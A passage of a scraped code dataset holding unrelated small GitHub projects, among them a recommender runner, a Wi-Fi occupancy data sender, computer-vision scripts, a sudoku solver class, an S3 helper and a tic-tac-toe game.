dumps\nfrom cf import resource_filepath, CollaborativeFiltering\nfrom argparse import ArgumentParser\n\n\ndef parse_arguments():\n parser = ArgumentParser(description=\"Collaborative filtering runner\")\n parser.add_argument(\"--user-id\", type=int, help=\"User id\", dest=\"user_id\", default=1)\n parser.add_argument(\"--ranks-filename\", type=str, help=\"Ranks filename\", dest=\"ranks_filename\", default=\"u.base\")\n parser.add_argument(\"--items-filename\", type=str, help=\"Items filename\", dest=\"items_filename\", default=\"u.item\")\n parser.add_argument(\"--model-filename\", type=str, help=\"Model filename\", dest=\"model_filename\", default=\"model.pkl\")\n group = parser.add_mutually_exclusive_group(required=True)\n group.add_argument(\"--train\", action=\"store_true\")\n group.add_argument(\"--test\", action=\"store_true\")\n return parser.parse_args()\n\n\ndef train(model_filepath, items_filepath, ranks_filepath):\n items_columns = [\"movie id\", \"movie title\", \"release date\", \"video release date\", \"IMDb URL\", \"unknown\", \"Action\",\n \"Adventure\",\n \"Animation\", \"Children's\", \"Comedy\", \"Crime\", \"Documentary\", \"Drama\", \"Fantasy\", \"Film-Noir\",\n \"Horror\",\n \"Musical\", \"Mystery\", \"Romance\", \"Sci-Fi\", \"Thriller\", \"War\", \"Western\"]\n ranks_columns = [\"user_id\", \"item_id\", \"rating\", \"timestamp\"]\n cf = CollaborativeFiltering()\n cf.load_data(items_filepath=items_filepath, ranks_filepath=ranks_filepath, items_columns=items_columns,\n ranks_columns=ranks_columns)\n\n cf.train()\n cf.serialize(model_filepath)\n print(dumps({\"model_filepath\": model_filepath}, indent=4))\n\n\ndef test(model_filepath):\n cf = CollaborativeFiltering.deserialize(model_filepath)\n predictions = cf.predict(args.user_id)\n print(dumps({\"predictions\": predictions, \"user-id\": args.user_id}, indent=4))\n\n\n\ndef main(args):\n model_filepath = resource_filepath(args.model_filename)\n if args.train:\n items_filepath = resource_filepath(args.items_filename)\n ranks_filepath = resource_filepath(args.ranks_filename)\n train(model_filepath, items_filepath, ranks_filepath)\n elif args.test:\n test(model_filepath)\n\n\nif __name__ == \"__main__\":\n args = 
parse_arguments()\n main(args)\n","repo_name":"BdoubleU42/cf","sub_path":"cf/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16931022861","text":"import pandas as pd\nimport os\nimport csv\nimport json \nimport requests\nimport sys\nimport time\n\nlocation = \"FILL\"\nname = \"FILL\"\ndsc = \"FILL\"\nlabel = \"FILL\"\nDATA_DIR = \"raw_data\"\n\n\"\"\"# Import the data\"\"\"\nwhile True:\n time.sleep(30*60) #30 minutes\n for csv in os.listdir(DATA_DIR):\n df = pd.read_csv(DATA_DIR+\"/\"+csv)\n df.drop(' BSSID', axis=1, inplace=True)\n df.drop(' Probed ESSIDs', axis=1, inplace=True)\n df.drop(' First time seen', axis=1, inplace=True)\n df.drop(' # packets', axis=1, inplace=True)\n df.columns = [\n 'mac',\n 'last_seen',\n 'power'\n ]\n data = df.to_dict()\n r = requests.post(\"api.studyspotter.ca\", data = {\"location\": location, \"name\": name, \"dsc\": dsc, \"label\": label, **data})","repo_name":"samuellando/StudySpotter","sub_path":"backend/nodes/send.py","file_name":"send.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"12486863030","text":"import torch\n\nDEVICE = torch.device('cuda:0')\nDATASET_PATH = \"dataset/images\"\nTRAIN_DATASET = \"dataset/train.csv\"\nTEST_DATASET = \"dataset/test.csv\"\nCOMPOSED_GTREND = \"dataset/gtrends.csv\"\nCATEG_DICT = \"category_labels.pt\"\nCOLOR_DICT = \"color_labels.pt\"\nFAB_DICT = \"fabric_labels.pt\"\nNUM_EPOCHS = 50\nUSE_TEACHERFORCING = True\nTF_RATE = 0.5\nLEARNING_RATE = 0.0001\nNORMALIZATION_VALUES_PATH = \"dataset/normalization_scale.npy\"\nBATCH_SIZE= 128\nSHOW_PLOTS = False\nNUM_WORKERS = 8\nUSE_EXOG = True\nEXOG_NUM = 3\nEXOG_LEN = 52\nHIDDEN_SIZE = 300\nSAVED_FEATURES_PATH = \"incv3_features\"\nUSE_SAVED_FEATURES = False\nNORM = False\nmodel_types = [\"image\", \"concat\", \"residual\", \"cross\"]\nMODEL = 1\n","repo_name":"HumaticsLAB/AttentionBasedMultiModalRNN","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"54"} +{"seq_id":"35924655561","text":"import cv2\nimport numpy as np\n\nfrom detectors.utils import translate, mask_diff\n\n\ndef find_dxy_mode(dx_dy_s, base=100):\n dxy = [dx * base + dy for dx, dy in dx_dy_s]\n counts = np.bincount(dxy)\n print(max(counts))\n dxy_mode = np.argmax(counts)\n dx = dxy_mode // base\n dy = dxy_mode % base\n return dx, dy\n\n\ndef sift_kp(image):\n gray_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n # gray_image = cv2.GaussianBlur(gray_image, (3, 3), 0)\n # gray_image = cv2.Canny(gray_image, 50, 100)\n # cv2.imshow('gray_image', gray_image)\n # cv2.waitKey()\n\n sift = cv2.xfeatures2d.SIFT_create()\n kp, des = sift.detectAndCompute(gray_image, None)\n kp_image = cv2.drawKeypoints(gray_image, kp, None)\n return kp_image, kp, des\n\n\ndef sift_match(img1_3c, img2_4c):\n img2_3c = img2_4c[:, :, :3]\n kpimg1, kp1, des1 = sift_kp(img1_3c)\n kpimg2, kp2, des2 = sift_kp(img2_3c)\n\n bf = cv2.BFMatcher()\n matches = bf.knnMatch(des1, des2, k=2)\n\n good_match_dx_dy_s = []\n for m, n in matches:\n x1, y1 = int(kp1[m.queryIdx].pt[0]), int(kp1[m.queryIdx].pt[1])\n x2, y2 = int(kp2[m.trainIdx].pt[0]), int(kp2[m.trainIdx].pt[1])\n good_match_dx_dy_s.append([m.distance / n.distance, n, abs(x1 - x2), abs(y1 - y2)])\n good_match_dx_dy_s 
= sorted(good_match_dx_dy_s)\n good_match_dx_dy_s = np.array(good_match_dx_dy_s)\n\n top_n = 5\n dx_dy_s = good_match_dx_dy_s[:top_n, 2:]\n\n dx, dy = find_dxy_mode(dx_dy_s)\n translated_img1 = translate(img1_3c, -dx, -dy)\n mask_diff_img, diff_sum = mask_diff(img2_4c[:, :, 3], img2_4c[:, :, :3], translated_img1)\n\n print(diff_sum)\n cv2.imshow(\"diff\", mask_diff_img)\n match_s = good_match_dx_dy_s[:top_n, 1]\n match_img = cv2.drawMatches(img1_3c, kp1, img2_3c, kp2, match_s, None, flags=2)\n cv2.imshow('match_img', match_img)\n cv2.waitKey()\n\n return diff_sum\n\n\nif __name__ == '__main__':\n import os\n\n reference_dir = 'calibrate_images'\n test_dir = 'test_images'\n for test_name in os.listdir(test_dir):\n test_im = cv2.imread(os.path.join(test_dir, test_name))\n for reference_name in os.listdir(reference_dir):\n reference_im = cv2.imread(os.path.join(reference_dir, reference_name), cv2.IMREAD_UNCHANGED)\n\n min_h = min(reference_im.shape[0], test_im.shape[0])\n min_w = min(reference_im.shape[1], test_im.shape[1])\n reference_im = reference_im[:min_h, :min_w, :]\n test_im = test_im[:min_h, :min_w, :]\n\n sift_match(test_im, reference_im)\n","repo_name":"Ryanshuai/auto_pubg","sub_path":"detectors/gun_scope_detector/deep_detection.py","file_name":"deep_detection.py","file_ext":"py","file_size_in_byte":2544,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"16465321925","text":"class Board:\n num_objects = 0 # Boardオブジェクトがいくつ作られたかトラッキングするクラス変数\n\n def __init__(self, data, allowed_digits=None):\n '''インスタンス変数self.dataは各マスに置かれた数字を要素とする9x9のリスト、\n self.allowed_digitsは各マスに置ける数字の集合を要素とする9x9のリスト'''\n Board.num_objects += 1\n self.data = data\n if allowed_digits is None:\n self.precompute_allowed_digits()\n else:\n self.allowed_digits = allowed_digits\n\n @classmethod\n def get_row(cls, obj, x):\n '''9x9の2次元リストobjからx行目を取り出す。objとしてはself.dataまたは\n self.allowed_digitsに準ずる2次元リストが渡されることを想定。'''\n return obj[x]\n\n @classmethod\n def get_column(cls, obj, y):\n '''9x9の2次元リストobjからy列目を取り出す'''\n return [obj[x][y] for x in range(9)]\n\n @classmethod\n def get_block(cls, obj, x, y):\n '''9x9の2次元リストobjから(x, y)が属する3x3ブロックを取り出す'''\n base_x = x // 3 * 3\n base_y = y // 3 * 3\n return [obj[x][y] for x in range(base_x, base_x + 3)\n for y in range(base_y, base_y + 3)]\n\n def filled(self):\n return all(0 not in self.data[x] for x in range(9))\n\n def verify(self):\n def check(xs):\n '''リストxsが0~9の数からなり、1~9については重複がないことを\n チェックするヘルパー関数'''\n xs = [x for x in xs if x != 0]\n return (len(set(xs)) == len(xs) and all(1 <= x <= 9 for x in xs))\n\n return (all(check(Board.get_row(self.data, x)) for x in range(9))\n and all(check(Board.get_column(self.data, y)) for y in range(9))\n and all(check(Board.get_block(self.data, x, y)) for x in (0, 3, 6)\n for y in (0, 3, 6)))\n\n def get_allowed_digits(self, x, y):\n return list(self.allowed_digits[x][y])\n\n def update_allowed_digits(self, allowed_digits, x, y, d):\n if d > 0:\n allowed_digits[x][y] = set()\n for obj in Board.get_row(allowed_digits, x):\n # 同じ行のマスの候補リストからdを除外\n obj.discard(d)\n for obj in Board.get_column(allowed_digits, y):\n # 同じ列のマスの候補リストからdを除外\n obj.discard(d)\n for obj in Board.get_block(allowed_digits, x, y):\n # 同じ3x3ブロックのマスの候補リストからdを除外\n obj.discard(d)\n\n def precompute_allowed_digits(self):\n self.allowed_digits = [\n [{1, 2, 3, 4, 5, 6, 7, 8, 9} for y in range(9)] for x in range(9)\n ]\n for x in range(9):\n for y in range(9):\n d = self.data[x][y]\n 
self.update_allowed_digits(self.allowed_digits, x, y, d)\n\n def move(self, x, y, d):\n assert self.data[x][y] == 0\n data = []\n for i, row in enumerate(self.data):\n if i != x:\n data.append(row)\n else:\n new_row = list(row)\n new_row[y] = d\n data.append(new_row)\n allowed_digits = [\n [set(self.allowed_digits[x][y]) for y in range(9)] for x in range(9)\n ] # set()をつけることによりdeep copyを行う\n self.update_allowed_digits(allowed_digits, x, y, d)\n return Board(data, allowed_digits)\n\n def __str__(self):\n separator = '+---+---+---+'\n lines = [separator]\n for i in range(0, 9, 3):\n for j in range(i, i + 3):\n lines.append('|%d%d%d|%d%d%d|%d%d%d|' % tuple(self.data[j]))\n lines.append(separator)\n return '\\n'.join(lines).replace('0', ' ')\n\n\nif __name__ == '__main__':\n import sudoku as su\n problem = Board(su.text_to_data(su.PROBLEM))\n solution = Board(su.text_to_data(su.SOLUTION))\n board = problem\n print(board.move(0, 1, 1))","repo_name":"hayasitakumi/python_study","sub_path":"miniproject7/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":3801,"program_lang":"python","lang":"ja","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"42732711874","text":"import cv2\nimport time\nimport numpy as np\n\nfrom django.core.exceptions import PermissionDenied\nfrom django.shortcuts import render\nfrom django.http import StreamingHttpResponse\nfrom django.views.decorators import gzip\nfrom tensorflow.keras.models import load_model\n\n\nemotions = {0: 'Angry', 1: 'Disgust', 2: 'Fear', 3: 'Happy', 4: 'Sad', 5: 'Surprise', 6: 'Neutral'}\n\n\ndef gen(camera):\n last_prediction = time.time()\n model = load_model(\"/home/greywater/Documents/Kirae/app/src/model/model_vgg13\")\n\n while True:\n ret, img = camera.read()\n img_bytes = cv2.imencode('.jpg', img)[1].tobytes()\n\n image_np = np.fromstring(img_bytes, np.uint8)\n image_cv = cv2.imdecode(image_np, cv2.IMREAD_COLOR)\n\n image_gray = cv2.cvtColor(image_cv, cv2.COLOR_BGR2GRAY)\n\n dir_cascade_files = r\"/home/greywater/Documents/Kirae/app/src/model/.opencv/haarcascades/\"\n cascade_file = dir_cascade_files + \"haarcascade_frontalface_alt2.xml\"\n cascade = cv2.CascadeClassifier(cascade_file)\n\n faces = cascade.detectMultiScale(\n image_gray,\n scaleFactor=1.1,\n minNeighbors=1,\n minSize=(48, 48),\n flags=cv2.CASCADE_SCALE_IMAGE\n )\n\n if len(faces) >= 1:\n for (x, y, w, h) in faces:\n image_cv = cv2.rectangle(image_cv, (x, y), (x+w, y+h), (255, 0, 0), 2)\n\n face_image = image_gray[y:y + h, x:x + w]\n image_face_cv = cv2.resize(face_image, (48, 48))\n image_enhanced = cv2.equalizeHist(image_face_cv)\n image_chan = image_enhanced.reshape(1, 48, 48, 1)\n\n if time.time() - last_prediction >= 5:\n prediction = emotions[np.argmax(model.predict(image_chan), axis=1)[0]]\n else:\n prediction = \"No face detected\"\n\n font = cv2.FONT_HERSHEY_SIMPLEX\n text_size = cv2.getTextSize(prediction, font, 1, 2)[0]\n text_X = (image_cv.shape[1] - text_size[0]) / 2\n text_Y = (image_cv.shape[0] + text_size[1]) / 2\n cv2.putText(image_cv, prediction, (int(text_X), int(text_Y)), font, 1, (0, 255, 0), 2)\n\n _, jpeg = cv2.imencode('.jpg', image_cv)\n\n yield (b'--frame\\r\\n'\n b'Content-Type: image/jpeg\\r\\n\\r\\n' + jpeg.tobytes() + b'\\r\\n\\r\\n')\n\n k = cv2.waitKey(30) & 0xff\n if k == 27:\n break\n camera.release()\n cv2.destroyAllWindows()\n\n\n@gzip.gzip_page\ndef webcam_feed(request):\n try:\n cam = cv2.VideoCapture(0)\n return StreamingHttpResponse(gen(cam), 
content_type=\"multipart/x-mixed-replace;boundary=frame\")\n except Exception as ex:\n print(ex)\n\n\ndef webcam(request):\n if request.user.is_authenticated :\n return render(request, \"web_ai/webcam.html\")\n else:\n raise PermissionDenied\n\n\ndef homepage(request):\n return render(request, \"web_ai/index.html\")\n\n","repo_name":"GreyWaterMatters/app_fer","sub_path":"web_ai/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72172168803","text":"\"\"\"\n @Author : liujianhan\n @Date : 2018/5/26 下午2:05\n @Project : action_class_v1\n @FileName : demo.py\n @Description : 多进程视频实时识别demo\n\"\"\"\nimport os\nimport time\nfrom multiprocessing import Queue, Process\n\nimport cv2\n\n# from action_class_v1.service import inference, load_model\nfrom action_class.service import get_dot_config, inference, load_model\n\n\ndef video_producer(video_path: str, task: Queue = Queue(), result: Queue = Queue()) -> None:\n \"\"\"\n 视频读取函数\n @param video_path: 视频路径\n @param task: 视频帧队列\n @param result: 识别结果队列\n @return:\n \"\"\"\n cap = cv2.VideoCapture(video_path)\n if not cap.isOpened():\n print('No video found!')\n os._exit(-1)\n n_frames = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\n fps = cap.get(cv2.CAP_PROP_FPS)\n dur = n_frames / fps\n print(f\"视频总帧数:{n_frames}帧\")\n print(f\"视频帧率:{int(fps)}帧每秒\")\n last = int(1/fps * 1000)\n print(f\"视频每帧持续时间:{last}ms\")\n print(f\"视频总时长:{dur}s\")\n\n t1 = time.time()\n cnt = 0\n action, score = '', 0\n ret, frame = cap.read()\n task.put(frame)\n cv2.namedWindow('frame', 0)\n cv2.resizeWindow('frame', 1920, 1080)\n while 1:\n if not result.empty():\n action, score = result.get()\n task.put(frame)\n if action == 'negative':\n cv2.putText(frame, f'Frame - {cnt} - {action} - score - {score}', (360, 60), cv2.FONT_HERSHEY_PLAIN, 3.0, (0, 255, 0), 2)\n elif action == 'positive':\n cv2.putText(frame, f'Frame - {cnt} - {action} - score - {score}', (360, 60), cv2.FONT_HERSHEY_PLAIN, 3.0, (0, 0, 255), 2)\n else:\n cv2.putText(frame, f'Initializing....', (360, 60), cv2.FONT_HERSHEY_PLAIN, 3.0, (0, 255, 0), 2)\n\n cv2.imshow('frame', frame)\n\n ret, frame = cap.read()\n if not ret:\n task.put(None)\n break\n\n # 设置延迟,在延迟期间按下ESC退出循环\n if cv2.waitKey(last) == 27:\n break\n cnt += 1\n\n print(f\"持续时间: {time.time() - t1:.3f}s\")\n cap.release()\n cv2.destroyAllWindows()\n\n\ndef model_consumer(task: Queue = Queue(), result: Queue = Queue()) -> None:\n \"\"\"\n 模型推理函数\n @param task:\n @param result:\n @return:\n \"\"\"\n while True:\n frame = task.get()\n if frame is None:\n print(\"没有视频数据了。\")\n break\n new_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n action, score = inference(new_frame)\n result.put((action, score))\n\n\nif __name__ == '__main__':\n os.environ['CUDA_VISIBLE_DEVICES'] = ''\n config = get_dot_config('action_class/config.yml')\n config.final_model_file = 'data_path/model/final_model_multi_output_0613.h5'\n load_model()\n\n task = Queue()\n result = Queue()\n video_path = 'action_class_v1/data_path/raw_video/20200527_103654.mp4'\n # video_path = 'action_class_v1/data_path/raw_video/20200527_104527.mp4'\n # video_path = 'rtmp://58.200.131.2:1935/livetv/dftv '\n # video_path = '../action_class_v1/data_path/raw_video/20200530_185954_test.mp4'\n\n # video_path = 'action_class_v1/data_path/raw_video/20200529/negative/VID_20200529_184219.mp4'\n # video_path = 'action_class_v1/data_path/raw_video/20200529/negative/VID_20200529_184701.mp4'\n # 
video_path = 'action_class_v1/data_path/raw_video/20200529/negative/VID_20200529_185238.mp4'\n # video_path = 'action_class_v1/data_path/raw_video/20200529/negative/VID_20200529_185502.mp4'\n\n # video_path = 'action_class_v1/data_path/raw_video/20200529/positive/VID_20200529_184035.mp4'\n # video_path = 'action_class_v1/data_path/raw_video/20200529/positive/VID_20200529_184609.mp4'\n # video_path = 'action_class_v1/data_path/raw_video/20200529/positive/VID_20200529_185150.mp4'\n # video_path = 'action_class_v1/data_path/raw_video/20200529/positive/VID_20200529_185104.mp4' # valid 测试4\n video_path = '../action_class_v1/data_path/raw_video/20200529/positive/VID_20200529_183928.mp4' # test 测试3\n\n # video_path = 'action_class/data_path/raw_video/20200610_190023.mp4' # 没有分帧的valid视频 测试2\n # video_path = '20200611_data/positive1_valid.mp4' # valid 测试1\n # video_path = '20200611_data/positive2.mp4' # train-3761frame\n # video_path = '20200611_data/positive3.mp4' # train-1737frame\n video_path = 'data_path/raw_video/20200611_data/positive4.mp4' # train-3240 candi3 temp\n # video_path = '20200611_data/positive5.mp4' # train-2575 candi2\n\n # video_path = '20200611_data/positive6.mp4' # train-2687frame\n # video_path = '20200611_data/positive7.mp4' # train-2089 candidate1\n # video_path = '20200611_data/positive8.mp4' # train-2690frame with pointself not recognize\n # video_path = '20200611_data/positive9.mp4' # train-444frame point myself\n c1 = Process(target=video_producer, args=(video_path, task, result))\n c1.start()\n model_consumer(task, result)\n","repo_name":"jh-lau/solid_ai_waddle","sub_path":"project/classification/posture_classification/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":5065,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"38603543105","text":"import requests\nimport json\nfrom dotenv import load_dotenv, find_dotenv\nimport os\n\n# Initilize API_KEY\n# Get the path to the directory this file is in\nBASEDIR = os.path.abspath(os.path.dirname(__file__))\n# Connect the path with your '.env' file name\nload_dotenv(os.path.join(BASEDIR, '.env'))\n\nAPI_KEY = os.getenv(\"API_Authorization\")\n\ndef get_university_from_db():\n base_url = \"https://api.m3o.com/v1/db/Read\"\n headers = {\n 'Content-Type': 'application/json',\n 'Authorization': 'Bearer ' + API_KEY\n}\n table_to_query = 'university'\n payload = json.dumps({\n \"table\": table_to_query\n })\n \n response = requests.post(base_url, headers=headers, data=payload)\n json_data = json.loads(response.text)\n return json_data['records']\n \ndef get_universities_by_country(country):\n base_url = \"http://universities.hipolabs.com/search?\"\n params = {\n 'country': country,\n }\n response = requests.get(base_url, params=params)\n status_code = response.status_code\n json_data = json.loads(response.text)\n return json_data, status_code","repo_name":"synco1111/Madlan_BE_Automation_Exercise","sub_path":"tests/universe_api.py","file_name":"universe_api.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26322778501","text":"import os\n\nfor file in os.listdir(\"./data\"):\n print(file)\n if file.endswith(\".md\") :\n new_name = file.rstrip(\".md\")\n src = \"./data/\"+file\n dist = \"./data/\"+new_name+\".rmd\"\n os.rename(src, dist)\n print(\"rename\", src, \"to\", dist)\n elif file.endswith(\".markdown\"):\n new_name = file.rstrip(\".markdown\")\n 
src = \"./data/\"+file\n dist = \"./data/\"+new_name+\".rmd\"\n os.rename(src, dist)\n print(\"rename\", src, \"to\", dist)\n\n","repo_name":"hominee/demo","sub_path":"tormd.py","file_name":"tormd.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71238354721","text":"import boto3\nfrom WrenchCL.WrenchLogger import wrench_logger\n\n\nclass S3Handler:\n \"\"\"\n A class to handle S3 operations following the Singleton pattern.\n\n Attributes:\n - s3_client (boto3.client): The S3 client used for operations.\n \"\"\"\n\n _instance = None # Singleton instance\n\n def __new__(cls):\n \"\"\"Implement Singleton pattern.\"\"\"\n if cls._instance is None:\n cls._instance = super(S3Handler, cls).__new__(cls)\n cls._instance.initialized = False # Indicate if the class has been initialized with configuration\n return cls._instance\n\n def __init__(self):\n self.initialized = False\n \"\"\"Initialize the S3Handler class.\"\"\"\n if not hasattr(self, \"s3_client\"):\n self.s3_client = None\n\n def load_configuration(self, key_id, secret_key, region):\n \"\"\"\n Load AWS configuration for S3 client.\n\n Parameters:\n - key_id (str): AWS Access Key ID\n - secret_key (str): AWS Secret Access Key\n - region (str): AWS region\n \"\"\"\n try:\n self.s3_client = boto3.client('s3', aws_access_key_id=key_id,\n aws_secret_access_key=secret_key,\n region_name=region)\n wrench_logger.debug('Initialized S3 client successfully.')\n self.initialized = True\n except Exception as e:\n wrench_logger.error(f'Failed to initialize S3 client: {e}')\n self.initialized = False\n raise e\n\n def list_files(self, bucket_name, s3_path_prefix=''):\n \"\"\"\n List files in an S3 bucket path.\n\n Parameters:\n - bucket_name (str): Name of the S3 bucket\n - s3_path_prefix (str): Path prefix to filter files\n\n Returns:\n - list: List of file names\n \"\"\"\n if not self.initialized:\n wrench_logger.error('S3Handler is not initialized. 
Please run the load_configuration() method')\n raise NotImplementedError\n\n response = self.s3_client.list_objects_v2(Bucket=bucket_name, Prefix=s3_path_prefix)\n return [item['Key'] for item in response.get('Contents', [])]\n\n def upload_file(self, bucket_name, file_path, s3_path):\n \"\"\"\n Upload a file to an S3 bucket.\n\n Parameters:\n - bucket_name (str): Name of the S3 bucket\n - file_path (str): Local path to the file to be uploaded\n - s3_path (str): Destination path in the S3 bucket\n\n Returns:\n - bool: True if successful, False otherwise\n \"\"\"\n try:\n self.s3_client.upload_file(file_path, bucket_name, s3_path)\n wrench_logger.info(f'File {file_path} uploaded to {s3_path} in bucket {bucket_name}.')\n return True\n except Exception as e:\n wrench_logger.error(f'Failed to upload file {file_path} to {s3_path} in bucket {bucket_name}: {e}')\n return False\n\n def delete_file(self, bucket_name, s3_path):\n \"\"\"\n Delete a file from an S3 bucket.\n\n Parameters:\n - bucket_name (str): Name of the S3 bucket\n - s3_path (str): Path in the S3 bucket to the file to be deleted\n\n Returns:\n - bool: True if successful, False otherwise\n \"\"\"\n try:\n self.s3_client.delete_object(Bucket=bucket_name, Key=s3_path)\n wrench_logger.info(f'File {s3_path} deleted from bucket {bucket_name}.')\n return True\n except Exception as e:\n wrench_logger.error(f'Failed to delete file {s3_path} from bucket {bucket_name}: {e}')\n return False\n\n\ns3Instance = S3Handler()\n","repo_name":"WrenchAI/WrenchCL","sub_path":"WrenchCL/S3Handler.py","file_name":"S3Handler.py","file_ext":"py","file_size_in_byte":3676,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"41692109642","text":"import reflex as rx\nfrom hello_reflex import style\nfrom hello_reflex.state import State\n\n\ndef qa(question: str, answer: str) -> rx.Component:\n return rx.box(\n rx.box(\n rx.text(question),\n style=style.question_style, # Apply styling to the question box\n text_align=\"right\", # Align the text within the question box to the right\n ),\n rx.box(\n rx.text(answer),\n style=style.answer_style,\n text_align=\"left\", # Align the text within the answer box to the left\n ),\n margin_y=\"1em\",\n )\n\n\ndef chat() -> rx.Component:\n return rx.box(\n rx.foreach(\n State.chat_history,\n lambda messages: qa(messages[0], messages[1]),\n )\n )\n\n\ndef action_bar() -> rx.Component:\n return rx.hstack(\n rx.input(\n id=\"question\",\n placeholder=\"Ask a question\",\n on_blur=State.set_question,\n style=style.input_style,\n ),\n rx.button(\n \"Ask\",\n on_click=State.answer,\n style=style.button_style,\n ),\n )\n\n\ndef index() -> rx.Component:\n return rx.container(\n rx.box(\n rx.heading(\"Nacho-GPT 💬\", size=\"2xl\"),\n style=style.nacho_gpt_heading,\n text_align=\"center\",\n ),\n chat(),\n action_bar(),\n rx.box(\n rx.text(\"Made with ❤️ by Nacho Campos Dev\"),\n rx.text(\"Powered by OpenAI's GPT-3\"),\n rx.html(\"
\"),\n style=style.custom_margin_footer,\n text_align=\"center\",\n ),\n style=style.custom_margin_container,\n )\n\n\napp = rx.App()\napp.add_page(index)\napp.compile()\n","repo_name":"N4choCM/Nacho_GPT","sub_path":"hello_reflex/hello_reflex.py","file_name":"hello_reflex.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7966646211","text":"print(\"Крестики нолики\")\nprint(\"Также как начать игру: Во первых на верхнем столбике, есть буква и число позиции куда нужно поставить\"\n \" крестик или нолик, например T1 первое число на левой строке, M2 позиция по середине и т.д. На графе \"\n \"все местоположения показываются.\")\nprint('''Правила игры: Приветсвую вас на игре Крестики Нолики. Правила игры просты это логическая \nигра между двумя противниками на квадратном поле 3 на 3 клетки. Нужно поставить крестики или нолики \nв горизонтальном, вертикальном ввиде и по диагонале.\n''')\n\nboard = {\n 'T1': ' ', 'T2': ' ', 'T3': ' ',\n 'M1': ' ', 'M2': ' ', 'M3': ' ',\n 'D1': ' ', 'D2': ' ', 'D3': ' '\n}\n\nplayer = 1\ntotal_moves = 0\nend_check = 0\n\n\ndef check():\n if board['T1'] == 'X' and board['T2'] == 'X' and board['T3'] == 'X':\n print('Первый игрок победил!')\n return 1\n if board['M1'] == 'X' and board['M2'] == 'X' and board['M3'] == 'X':\n print('Первый игрок победил!!')\n return 1\n if board['D1'] == 'X' and board['D2'] == 'X' and board['D3'] == 'X':\n print('Первый игрок победил!!')\n return 1\n\n if board['T1'] == 'X' and board['M2'] == 'X' and board['D3'] == 'X':\n print('Первый игрок победил!!')\n return 1\n\n if board['T3'] == 'X' and board['M2'] == 'X' and board['D1'] == 'X':\n print('Первый игрок победил!!')\n return 1\n\n if board['T1'] == 'X' and board['M1'] == 'X' and board['D1'] == 'X':\n print('Первый игрок победил!')\n return 1\n if board['T2'] == 'X' and board['M2'] == 'X' and board['D2'] == 'X':\n print('Первый игрок победил!!')\n return 1\n if board['T3'] == 'X' and board['M3'] == 'X' and board['D3'] == 'X':\n print('Первый игрок победил!!')\n return 1\n\n if board['T1'] == 'O' and board['T2'] == 'O' and board['T3'] == 'O':\n print('Второй игрок победил!!')\n return 1\n if board['M1'] == 'O' and board['M2'] == 'O' and board['M3'] == 'O':\n print('Второй игрок победил!!')\n return 1\n if board['D1'] == 'O' and board['D2'] == 'O' and board['D3'] == 'O':\n print('Второй игрок победил!!')\n return 1\n if board['T1'] == 'O' and board['M2'] == 'O' and board['D3'] == 'O':\n print('Второй игрок победил!!')\n return 1\n if board['T1'] == 'O' and board['M1'] == 'O' and board['D1'] == 'O':\n print('Второй игрок победил!')\n return 1\n if board['T2'] == 'O' and board['M2'] == 'O' and board['D2'] == 'O':\n print('Второй игрок победил!')\n return 1\n if board['T3'] == 'O' and board['M3'] == 'O' and board['D3'] == 'O':\n print('Второй игрок победил!!')\n return 1\n return 0\n\n\nprint('T1|T2|T3')\nprint('- +- +-')\nprint('M1|M2|M3')\nprint('- +- +-')\nprint('D1|D2|D3')\nprint('***************************')\n\nwhile True:\n print(board['T1'] + '|' + board['T2'] + '|' + board['T3'])\n print('-+-+-')\n print(board['M1'] + '|' + board['M2'] + '|' + board['M3'])\n print('-+-+-')\n print(board['D1'] + '|' + board['D2'] + '|' + board['D3'])\n end_check = check()\n if total_moves == 9 or end_check == 1:\n break\n while True:\n if player == 1:\n p1_input = input('Первый игрок')\n if p1_input.upper() in board and board[p1_input.upper()] == ' ':\n board[p1_input.upper()] = 'X'\n player = 
2\n break\n\n else:\n print('Неверный индекс, Попробуйте, еще раз!')\n continue\n else:\n p2_input = input('Второй игрок')\n if p2_input.upper() in board and board[p2_input.upper()] == ' ':\n board[p2_input.upper()] = 'O'\n player = 1\n break\n else:\n print('Неверный индекс, Попробуйте, еще раз!')\n continue\n\n total_moves += 1\n print('***************************')\n print()\n","repo_name":"Akna3ap/Homeworks-Month-1-","sub_path":"Крестики нолики игра.py","file_name":"Крестики нолики игра.py","file_ext":"py","file_size_in_byte":4663,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"10976395818","text":"import sys\nsys.stdin = open('input14888.txt', 'r')\n\n\ndef dfs(i,res,plus,minus,multi,division):\n global max_num,min_num\n if i == n:\n max_num = max(max_num,res)\n min_num = min(min_num,res)\n return\n\n if plus:\n dfs(i+1,res+nums[i], plus-1,minus,multi,division)\n if minus:\n dfs(i + 1, res - nums[i], plus, minus-1, multi, division)\n if multi:\n dfs(i + 1, res * nums[i], 